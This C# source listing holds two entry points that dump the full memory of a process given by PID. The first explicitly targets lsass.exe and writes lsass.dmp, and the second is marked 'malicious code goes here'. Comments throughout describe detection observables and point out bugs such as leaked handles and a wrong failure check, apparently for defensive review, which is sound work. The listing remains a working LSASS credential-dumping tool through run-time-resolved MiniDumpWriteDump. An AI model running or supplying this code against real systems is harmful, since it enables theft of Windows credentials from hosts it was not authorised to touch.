/// <summary>
/// Entry point: writes a MiniDumpWriteDump image of the process whose PID is args[0] to
/// "lsass.dmp" in the current working directory. The usage text and file name name the
/// intended target; from a defender's view the observable events are the dynamically
/// resolved Dbghelp!MiniDumpWriteDump call, the cross-process handle to the target, and the
/// full-memory dump file left on disk.
/// </summary>
/// <param name="args">args[0] is converted with Convert.ToInt32; a non-numeric value throws
/// FormatException, which nothing in this method catches.</param>
/// <returns>1 when no PID argument is given; otherwise 0, even when the dump failed.</returns>
static int Main(string[] args)
{
    if (args.Length == 0)
    {
        Console.WriteLine("[-] Usage SharpDump.exe Lsass.exe's Pid");
        Console.WriteLine("[-] Example SharpDump.exe 1120");
        return(1);
    }
    bool bSuccess = false;
    string filename = "lsass.dmp";
    // NOTE(review): the stream is never disposed, so the dump file handle stays open until
    // process exit. FileShare.Write permits other writers on the file while it is being written.
    FileStream fs = new FileStream(filename, FileMode.Create, FileAccess.ReadWrite, FileShare.Write);
    // MiniDumpWriteDump is resolved at run time through LoadLibrary/GetProcAddress and called
    // through a delegate rather than a direct P/Invoke; the LoadLibrary/GetProcAddress imports
    // and the MiniDumpWriteDump delegate type are declared outside this listing.
    IntPtr createPtr = GetProcAddress(LoadLibrary("Dbghelp.dll"), "MiniDumpWriteDump");
    // createPtr is not checked for IntPtr.Zero; a failed lookup surfaces as an exception from
    // GetDelegateForFunctionPointer rather than a handled error.
    MiniDumpWriteDump miniDumpWriteDump = (MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(createPtr, typeof(MiniDumpWriteDump));
    Console.WriteLine("[+] MiniDumpWriteDump found at 0x{0}", createPtr.ToString("X"));
    Int32 ProcessID = Convert.ToInt32(args[0]);
    // The target handle comes from Process.Handle; this code does not choose an access mask
    // itself (contrast the explicit OpenProcess mask in the other Main on this page).
    Process process = Process.GetProcessById(ProcessID);
    // Dump type 2 is MiniDumpWithFullMemory: the target's entire address space is written out.
    // Callback and user-stream parameters are all IntPtr.Zero (no filtering of the dump).
    bSuccess = miniDumpWriteDump(process.Handle, (uint)process.Id, fs.SafeFileHandle, 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
    Console.WriteLine("[+] Process Completed ({0})", bSuccess);
    if (bSuccess)
    {
        // NOTE(review): the printed path ends in "(unknown)" rather than the value of
        // filename; the file actually written is lsass.dmp in the current directory.
        Console.WriteLine($"[+] lsass process dumped successfully and saved at {Directory.GetCurrentDirectory()}\\(unknown)");
    }
    else
    {
        Console.WriteLine("[-] Cannot Dump Lsass.");
    }
    return(0);
}
/// <summary>
/// Entry point: opens the process whose PID is args[0], creates "memory.dmp" in the current
/// working directory through the raw CreateFile API, and writes a MiniDumpWriteDump
/// full-memory image of the target into it. Defender-relevant observables: the run-time
/// resolution of Dbghelp!MiniDumpWriteDump, an OpenProcess with query/read access to the
/// target, and the memory.dmp artifact on disk.
/// </summary>
/// <param name="args">args[0] is the target PID. There is no args.Length check, so running
/// without arguments throws IndexOutOfRangeException; a non-numeric value throws
/// FormatException.</param>
static void Main(string[] args)
{
    // CleanUp() is defined outside this listing; what it removes cannot be told from here.
    CleanUp();
    Console.WriteLine("Clean Up Completed");
    // malicious code goes here
    Int32 PID = Convert.ToInt32(args[0]);
    IntPtr hFile = IntPtr.Zero;
    IntPtr hProc = IntPtr.Zero;
    bool bSuccess = false;
    // MiniDumpWriteDump is resolved at run time through LoadLibrary/GetProcAddress and invoked
    // through a delegate; the P/Invoke declarations (LoadLibrary, GetProcAddress, OpenProcess,
    // CreateFile) and the delegate type are declared outside this listing.
    IntPtr createPtr = GetProcAddress(LoadLibrary("Dbghelp.dll"), "MiniDumpWriteDump");
    // createPtr is not validated; a failed lookup throws from GetDelegateForFunctionPointer.
    MiniDumpWriteDump miniDumpWriteDump = (MiniDumpWriteDump)Marshal.GetDelegateForFunctionPointer(createPtr, typeof(MiniDumpWriteDump));
    Console.WriteLine("MiniDumpWriteDump found at 0x{0}", createPtr.ToString("X"));
    // PROCESS_QUERY_INFORMATION | PROCESS_VM_READ = 1040
    // (0x0400 | 0x0010): the minimum rights MiniDumpWriteDump needs to read the target.
    hProc = OpenProcess(1040, false, PID);
    Console.WriteLine("Process HANDLE 0x{0}\n", hProc.ToString("X"));
    if (hProc == IntPtr.Zero)
    {
        // Exit code 0 is returned even though the open failed.
        Console.WriteLine("HANDLE is NULL. Exiting");
        Environment.Exit(0);
    }
    // GENERIC_WRITE 1073741824
    // FILE_SHARE_WRITE 2
    // CREATE_ALWAYS 2
    // FILE_ATTRIBUTE_NORMAL 128
    // The dump goes to memory.dmp in the current working directory; CREATE_ALWAYS overwrites
    // any existing file of that name.
    hFile = CreateFile("memory.dmp", 1073741824, 2, IntPtr.Zero, 2, 128, IntPtr.Zero);
    Console.WriteLine("memory.dmp HANDLE 0x{0}\n", hFile.ToString("X"));
    // NOTE(review): CreateFile signals failure with INVALID_HANDLE_VALUE (-1), not NULL, so a
    // failed open passes this check and the invalid handle is handed to MiniDumpWriteDump.
    if (hFile == IntPtr.Zero)
    {
        Console.WriteLine("HANDLE is NULL. Exiting");
        Environment.Exit(0);
    }
    // Dump type 2 is MiniDumpWithFullMemory; callback and user-stream parameters are unused.
    bSuccess = miniDumpWriteDump(hProc, PID, hFile, 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
    // NOTE(review): neither hProc nor hFile is passed to CloseHandle; both native handles leak
    // until process exit.
    Console.WriteLine("Process Completed ({0})", bSuccess);
}